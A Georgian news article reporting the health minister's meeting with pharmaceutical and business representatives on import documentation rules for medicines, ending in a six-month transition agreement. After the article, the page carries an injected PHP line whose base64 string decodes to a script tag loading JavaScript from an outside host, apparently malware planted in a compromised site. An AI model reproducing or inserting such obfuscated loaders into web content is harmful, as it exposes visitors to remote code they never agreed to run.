celsiusi
ავერსი საქკაბელი

ჯანდაცვის მინისტრი, მიხეილ სარჯველაძე, მინისტრის პირველ მოადგილე თამარ გაბუნიასთან ერთად, ფარმაცევტული სექტორისა და ბიზნეს ასოციაციის წარმომადგენლებს შეხვდა.

ჯანდაცვის მინისტრი, მიხეილ სარჯველაძე, მინისტრის პირველ მოადგილე თამარ გაბუნიასთან ერთად, ფარმაცევტული სექტორისა და ბიზნეს ასოციაციის წარმომადგენლებს შეხვდა.

მხარეებმა, ის ცვლილებები განიხილეს, რომლებიც ქვეყანაში, მედიკამენტებისა და მათი დამზადებისთვის საჭირო ინგრედიენტების იმპორტირებისას, შესაბამისი მარეგულირებლის მიერ გაცემული დოკუმენტაციის წარმოდგენის ვალდებულებას აწესებს.

ცვლილების ამოქმედება 1-ლი აპრილიდან იგეგმებოდა, თუმცა შეხვედრაზე, სექტორის წარმომადგენლებმა, ვადის გახანგრძლივების ინიციატივა დააყენეს. მხარეები, 6-თვიან გარდამავალ პერიოდზე შეთანხმდნენ. შეხვედრაზე აღინიშნა, რომ ამ მიმართულებით მუშაობა, სექტორთან მჭიდრო თანამშრომლობით, გაგრძელდება.
 
ჯანდაცვის მინისტრის თქმით, უწყების პრიორიტეტი მედიკამენტების ხარისხის კონტროლი და მომხმარებლების ინტერესების დაცვაა.
 
„პრიორიტეტულია, საქართველოში, მედიკამენტების სათანადო ხარისხის უზრუნველყოფა და მომხმარებლის ინტერესების მაქსიმალურად დაცვა, თუმცა მწარმოებელთა ინტერესების დაბალანსებულად დაცვის პირობით. მათი დაცვის პირობით, ისეთი შეზღუდვებისგან, რომელიც ჩაითვლება არასაჭიროდ, ზემოაღნიშნულ პრიორიტეტთან მიმართებაში”,- განაცხადა ჯანდაცვის მინისტრმა.
 
შეხვედრაზე, შეთანხმდნენ, რომ სამინისტრო, უახლოეს პერიოდში, ამ კონკრეტული მიმართულებით, შესაბამის ცვლილებებს დააინიციირებს. შეხვედრას სამედიცინო და ფარმაცევტული საქმიანობის რეგულირების სააგენტოს ხელმძღვანელი პირები, ჯანმრთელობის დაცვისა და სოციალურ საკითხთა კომიტეტის თავმჯდომარე ზაზა ლომინაძე და ბიზნესომბუდსმენი ოთარ დანელია ესწრებოდნენ.
210
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");